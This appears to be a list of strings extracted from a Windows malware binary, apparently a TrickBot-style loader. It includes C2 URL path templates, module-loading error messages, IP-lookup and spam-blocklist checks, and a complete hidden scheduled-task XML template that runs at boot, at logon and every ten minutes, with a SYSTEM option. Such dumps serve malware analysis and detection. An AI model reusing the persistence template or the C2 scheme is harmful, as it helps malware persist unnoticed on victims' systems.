b'checkip.amazonaws.com'
b'ipecho.net'
b'ipinfo.io'
b'api.ipify.org'
b'icanhazip.com'
b'myexternalip.com'
b'wtfismyip.com'
b'ip.anysrc.net'
b'api.ipify.org'
b'api.ip.sb'
b'ident.me'
b'www.myexternalip.com'
b'/plain'
b'/ip'
b'/raw'
b'/text'
b'/?format=text'
b'zen.spamhaus.org'
b'cbl.abuseat.org'
b'b.barracudacentral.org'
b'dnsb'
b'\xc2\xd3\x12\xe7V6W\x07&\xf7FV7B\xe6\xe6W@'
b'spam.dnsbl.sorbs.net'
b'%s.%s'
b'.tmp'
b'/%s/%s/5/%s/'
b'shlwapi'
b'UrlEscapeW'
b'ModuleQuery'
b'WantRelease'
b'VERS'
b'SINJ'
b'%s%s'
b'%02X'
b'kernel32.dll'
b'GetProcAddress'
b'<LogonType>InteractiveToken</LogonType>\n<RunLevel>LeastPrivilege</RunLevel>'
b'<RunLevel>HighestAvailable</RunLevel>\n<GroupId>NT AUTHORITY\\SYSTEM</GroupId>\n<LogonType>InteractiveToken</LogonType>\n'
b'<?xml version="1.0" encoding="UTF-16"?>\n<Task version="1.2"\nxmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">\n<RegistrationInfo>\n<Version>1.0.1</Version>\n<Description>Network validate task</Description>\n<URI></URI>\n</RegistrationInfo>\n<Triggers>\n'
b'<BootTrigger>\n<Enabled>true</Enabled>\n'
b'<LogonTrigger>\n<Enabled>true</Enabled>\n'
b'<UserId>'
b'</UserId>'
b'</LogonTrigger>\n'
b'</BootTrigger>\n'
b'<TimeTrigger>\n<Repetition>\n<Interval>PT10M</Interval>\n<Duration>P416DT15H28M</Duration>\n<StopAtDurationEnd>false</StopAtDurationEnd>\n</Repetition>\n<StartBoundary>'
b'%04d-%02d-%02dT%02d:%02d:%02d'
b'</StartBoundary>\n<Enabled>true</Enabled>\n</TimeTrigger>\n</Triggers>\n<Principals>\n<Principal id="Author">\n'
b'</Principal>\n</Principals>\n<Settings>\n<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\n<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\n<AllowHardTerminate>false</AllowHardTerminate>\n<StartWhenAvailable>true</StartWhenAvailable>\n<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\n<IdleSettings>\n<StopOnIdleEnd>true</StopOnIdleEnd>\n<RestartOnIdle>false</RestartOnIdle>\n</IdleSettings>\n<AllowStartOnDemand>true</AllowStartOnDemand>\n<Enabled>true</Enabled>\n<Hidden>true</Hidden>\n<RunOnlyIfIdle>false</RunOnlyIfIdle>\n<WakeToRun>false</WakeToRun>\n<ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\n<Priority>7</Priority>\n</Settings>\n<Actions Context="Author">\n<Exec>\n<Command>'
b'</Command>\n</Exec>\n</Actions>\n</Task>\n'
b'Data\\'
b'%s%s_configs\\'
b'LoadLibraryW'
b'GET'
b'CI failed, 0x%x'
b'/%s/%s/23/%d/'
b'Module is not valid'
b'Microsoft Software Key Storage Provider'
b'ECCPUBLICBLOB'
b'/%s/%s/1/%s/'
b'/%s/%s/0/%s/%s/%s/%s/%s/'
b'Win32 error'
b'GetParentInfo error'
b'Decode from BASE64 error'
b'start'
b'release'
b'Module already unloaded'
b'Process was unloaded'
b' working'
b'Process has been finished'
b'Start failed'
b'Control failed'
b'Invalid params count'
b'Unable to load module from server'
b'No params'
b'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.2228.0 Safari/537.36'
b'/%s/%s/25/%s/'
b'NetvalTask'
b'SYSTEM'
b'S-1-5-18'
b'/%s/%s/14/%s/%s/0/'
b'user'
b'cmd.exe'
b'fifty'
b'tmp'
b'svchost.exe'
b'D:(A;;GA;;;WD)(A;;GA;;;BA)(A;;GA;;;SY)(A;;GA;;;RC)'
b'%s/%s/63/%s/%s/%s/%s/'
b'noname'
b'%s/%s/64/%s/%s/%s/'
b'data'
b'info'
b'SignalObjectAndWait'
b'WaitForSingleObject'
b'CloseHandle'
b'ResetEvent'
b'ExitProcess'
b'InitializeCriticalSection'
b'EnterCriticalSection'
b'LeaveCriticalSection'
b'wtsapi32'
b'WTSEnumerateSessionsA'
b'WTSFreeMemory'
b'WTSGetActiveConsoleSessionId'
b'WTSQueryUserToken'
b'------Boundary%08X'
b'Content-Type: multipart/form-data; boundary=%s\r\nContent-Length: %d\r\n\r\n'
b'--%s\r\nContent-Disposition: form-data; name="%S"\r\n\r\n'
b'--%s--\r\n\r\n'
b'.onion'
b'Module has already been loaded'
b'Load to M failed'
b'Run D failed'
b'Load to P failed'
b'Find P failed'
b'Create ZP failed'
b'<moduleconfig>*</moduleconfig>'
b'SeTcbPrivilege'
b'winsta0\\default'
b'1057'
b'autorun'
b'settings.ini'
b' %u %u %u %u'
b'/%s/%s/10/%s/%s/%d/'
b'NAT status'
b'failed'
b'client is behind NAT'
b'client is not behind NAT'
b'DNSBL'
b'listed'
b'not listed'
b'pIT NULL'
b'%s.%s.%s.%s'
b'ver.txt'
b'%s sTart'
b'%s %s'
b'path'
b'Global\\Muta'
b'Global\\%08lX%04lX%lu'
b'POST'
b'ECDSA_P384'
b'SignatureLength'
b'%d%d%d.'
b'spk'
b'0.0.0.0'
b'Start'
b'Control'
b'FreeBuffer'
b'Release'
b'pIT connect failed, 0x%x'
b'pIT GetFolder failed, 0x%x'
b'Create xml failed'
b'Create xml2 failed'
b'Register u failed, 0x%x'
b'Register s failed, 0x%x'
b'Unknown'
b'Windows 2000'
b'Windows XP'
b'Windows Server 2003'
b'Windows Vista'
b'Windows Server 2008'
b'Windows 7'
b'Windows Server 2008 R2'
b'Windows 8'
b'Windows Server 2012'
b'Windows 8.1'
b'Windows Server 2012 R2'
b'Windows 10'
b'Windows 10 Server'
b'x86'
b'x64'
b'%s %s SP%d'
b'USERENV.dll'
b'ole32.dll'
b'CRYPT32.dll'
b'ncrypt.dll'
b'ADVAPI32.dll'
b'OLEAUT32.dll'
b'ntdll.dll'
b'IPHLPAPI.DLL'
b'WINHTTP.dll'
b'bcrypt.dll'
b'WS2_32.dll'
b'USER32.dll'
b'SHLWAPI.dll'
b'SHELL32.dll'
